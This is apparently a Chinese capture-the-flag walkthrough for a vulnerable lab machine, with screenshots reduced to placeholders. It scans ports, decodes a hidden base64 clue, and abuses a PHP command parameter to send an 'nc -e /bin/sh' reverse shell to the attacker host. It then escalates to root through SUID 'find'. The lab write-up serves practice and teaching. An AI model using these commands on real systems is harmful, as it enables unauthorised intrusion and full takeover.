扫不到 IP 问题:
可以参考之前的文章:

改了之后就扫到了

image.png
image.png

nmap -p- -A 192.168.149.173 扫描一下端口

image.png
image.png

查看网页源码,最下面有个 base64,解出来看看

image.png
image.png

解了 3 次,解出来个 workinginprogress.php

访问一下,看着这个页面莫名其妙的感觉应该有命令执行…试了一下…这…

image.png
image.png

kali 上面监听一下

image.png
image.png

访问一下:
http://192.168.149.173/workinginprogress.php?cmd=nc -e /bin/sh 192.168.149.141 6666

image.png
image.png

python -c “import pty;pty.spawn(‘/bin/bash’)” 打开一个交互 shell

find / -user root -perm -4000 -print 2>/dev/null
看一下哪一些程序用 root 权限运行的

image.png
image.png

find . -exec /bin/sh -p ; -quit

image.png
image.png